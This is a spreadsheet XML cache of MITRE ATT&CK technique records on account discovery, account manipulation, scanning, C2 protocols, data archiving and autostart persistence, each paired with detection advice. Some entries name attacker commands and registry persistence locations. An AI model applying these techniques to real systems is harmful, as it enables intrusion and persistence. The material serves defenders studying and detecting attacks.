    <s v="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_x000a__x000a_* Event ID 4723 - An attempt was made to change an account's password_x000a_* Event ID 4724 - An attempt was made to reset an account's password_x000a_* Event ID 4726 - A user account was deleted_x000a_* Event ID 4740 - A user account was locked out_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1087"/>
    <x v="12"/>
    <s v="Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior."/>
    <s v="https://attack.mitre.org/techniques/T1087"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="2.2999999999999998"/>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Monitor for processes that can be used to enumerate user accounts, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)"/>
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Daniel Stepanic, Elastic; Microsoft Threat Intelligence Center (MSTIC); Travis Smith, Tripwire"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1087.004"/>
    <x v="13"/>
    <s v="Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1087/004"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="1.2"/>
    <x v="2"/>
    <s v="Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery._x000a__x000a_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s v="Azure AD, Google Workspace, IaaS, Office 365, SaaS"/>
    <s v="Command: Command Execution, User Account: User Account Metadata"/>
    <b v="1"/>
    <s v="T1087"/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1087.002"/>
    <x v="14"/>
    <s v="Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior._x000a__x000a_Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups."/>
    <s v="https://attack.mitre.org/techniques/T1087/002"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1087"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1087.003"/>
    <x v="15"/>
    <s v="Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1087/003"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="1.100000000000000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Google Workspace, Office 365, Windows"/>
    <s v="Command: Command Execution, User Account: User Account Metadata"/>
    <b v="1"/>
    <s v="T1087"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1087.001"/>
    <x v="16"/>
    <s v="Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1087/001"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1.100000000000000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Monitor for processes that can be used to enumerate user accounts, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)"/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1087"/>
    <s v="Daniel Stepanic, Elastic"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1098"/>
    <x v="17"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1098"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity._x000a__x000a_Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts."/>
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS"/>
    <s v="Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification"/>
    <b v="0"/>
    <m/>
    <s v="Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian; Tim MalcomVetter"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1098.003"/>
    <x v="18"/>
    <s v="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_x000a__x000a_This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity."/>
    <s v="https://attack.mitre.org/techniques/T1098/003"/>
    <d v="2020-01-19T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. "/>
    <s v="Office 365"/>
    <s v="User Account: User Account Modification"/>
    <b v="1"/>
    <s v="T1098"/>
    <s v="Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1098.001"/>
    <x v="19"/>
    <s v="Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment._x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1098/001"/>
    <d v="2020-01-19T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="3"/>
    <s v="Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account._x000a__x000a_Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity."/>
    <s v="Azure AD, IaaS"/>
    <s v="Active Directory: Active Directory Object Modification, User Account: User Account Modification"/>
    <b v="1"/>
    <s v="T1098"/>
    <s v="Expel; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Oleg Kolesnikov, Securonix"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1098.002"/>
    <x v="20"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1098/002"/>
    <d v="2020-01-19T00:00:00"/>
    <d v="2020-05-04T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts._x000a__x000a_A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring."/>
    <s v="Office 365, Windows"/>
    <s v="Group: Group Modification, User Account: User Account Modification"/>
    <b v="1"/>
    <s v="T1098"/>
    <s v="Jannie Li, Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1098.004"/>
    <x v="21"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1098/004"/>
    <d v="2020-06-24T00:00:00"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file._x000a__x000a_Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1098"/>
    <s v="Tony Lambert, Red Canary"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1583"/>
    <d v="2020-09-30T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult._x000a__x000a_Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control."/>
    <s v="PRE"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583.005"/>
    <x v="23"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1583/005"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1583"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583.002"/>
    <x v="24"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1583/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3"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583.001"/>
    <x v="25"/>
    <s v="Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free._x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1583/001"/>
    <d v="2020-09-30T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1583"/>
    <s v="Deloitte Threat Library Team; Vinayak Wadhwa, Lucideus; Wes Hurd"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583.004"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1583/004"/>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3"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583.003"/>
    <x v="27"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1583/003"/>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3"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1583.006"/>
    <x v="28"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1583/006"/>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s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1583"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1595"/>
    <x v="29"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1595"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="5"/>
    <s v="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Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1595.001"/>
    <x v="30"/>
    <s v="Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1595/001"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="5"/>
    <s v="Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1595"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1595.002"/>
    <x v="31"/>
    <s v="Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1595/002"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="5"/>
    <s v="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Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1595"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1071"/>
    <x v="32"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1071"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="2"/>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s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1071.004"/>
    <x v="33"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1071/004"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-10-21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_x000a__x000a_Monitor for DNS traffic to/from known-bad or suspicious domains."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1071"/>
    <s v="Jan Petrov, Citi"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1071.002"/>
    <x v="34"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1071/002"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-08-21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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1071"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1071.003"/>
    <x v="35"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1071/003"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-10-21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s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1071"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1071.001"/>
    <x v="36"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1071/001"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-03-26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_x000a__x000a_Monitor for web traffic to/from known-bad or suspicious domains. "/>
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1071"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1010"/>
    <x v="37"/>
    <s v="Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger."/>
    <s v="https://attack.mitre.org/techniques/T1010"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1.1000000000000001"/>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macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1560"/>
    <x v="38"/>
    <s v="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_x000a__x000a_Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method."/>
    <s v="https://attack.mitre.org/techniques/T1560"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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_x000a__x000a_A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures._x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1560.003"/>
    <x v="39"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1560/003"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1560"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1560.002"/>
    <x v="40"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1560/002"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used._x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1560"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1560.001"/>
    <x v="41"/>
    <s v="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_x000a__x000a_Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems."/>
    <s v="https://attack.mitre.org/techniques/T1560/001"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1560"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1123"/>
    <x v="42"/>
    <s v="An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information._x000a__x000a_Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later."/>
    <s v="https://attack.mitre.org/techniques/T1123"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system._x000a__x000a_Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1119"/>
    <x v="43"/>
    <s v="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_x000a__x000a_This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files."/>
    <s v="https://attack.mitre.org/techniques/T1119"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1020"/>
    <x v="44"/>
    <s v="Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1020"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1.2"/>
    <x v="8"/>
    <s v="Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious."/>
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <s v="ExtraHop"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1020.001"/>
    <x v="45"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1020/001"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="8"/>
    <s v="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
    <s v="Network"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1020"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1197"/>
    <x v="46"/>
    <s v="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_x000a__x000a_The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)_x000a__x000a_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_x000a__x000a_BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)"/>
    <s v="https://attack.mitre.org/techniques/T1197"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1.2"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Brent Murphy, Elastic; David French, Elastic; Red Canary; Ricardo Dias"/>
    <m/>
    <s v="Firewall, Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1547"/>
    <x v="47"/>
    <s v="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_x000a__x000a_Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges."/>
    <s v="https://attack.mitre.org/techniques/T1547"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL._x000a__x000a_Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Driver: Driver Load, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <s v="Administrator, User, root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.014"/>
    <x v="48"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/014"/>
    <d v="2020-12-18T00:00:00"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor Registry key additions and/or modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;._x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)"/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.002"/>
    <x v="49"/>
    <s v="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_x000a__x000a_Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;&quot;Authentication Packages&quot;=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded."/>
    <s v="https://attack.mitre.org/techniques/T1547/002"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.006"/>
    <x v="50"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/006"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="10"/>
    <s v="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quot;kernel object&quot;) since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)_x000a__x000a_For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity._x000a__x000a_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s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Creation, Kernel: Kernel Module Load"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Anastasios Pingios; Jeremy Galloway; Red Canary; Wayne Silva, F-Secure Countercept"/>
    <s v="root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.008"/>
    <x v="51"/>
    <s v="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_x000a__x000a_Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads."/>
    <s v="https://attack.mitre.org/techniques/T1547/008"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)_x000a__x000a_Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. "/>
    <s v="Windows"/>
    <s v="Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Vincent Le Toux"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.011"/>
    <x v="52"/>
    <s v="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_x000a__x000a_Adversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) _x000a__x000a_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quot;hide&quot;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
    <s v="https://attack.mitre.org/techniques/T1547/011"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2021-03-30T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like &quot;Knock Knock&quot; can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed._x000a__x000a_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_x000a__x000a_Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity."/>
    <s v="macOS"/>
    <s v="File: File Creation, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1547"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.010"/>
    <x v="53"/>
    <s v="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_x000a__x000a_The Registry key contains entries for the following:_x000a__x000a_* Local Port_x000a_* Standard TCP/IP Port_x000a_* USB Monitor_x000a_* WSD Port_x000a__x000a_Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM."/>
    <s v="https://attack.mitre.org/techniques/T1547/010"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. _x000a__x000a_Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)"/>
    <s v="Windows"/>
    <s v="File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1547"/>
    <s v="Stefan Kanthak; Travis Smith, Tripwire"/>
    <s v="Administrator, SYSTEM"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1547.012"/>
    <x v="54"/>
    <s v="Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1547/012"/>
    <d v="2020-10-05T00:00:00"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="1"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious."/>
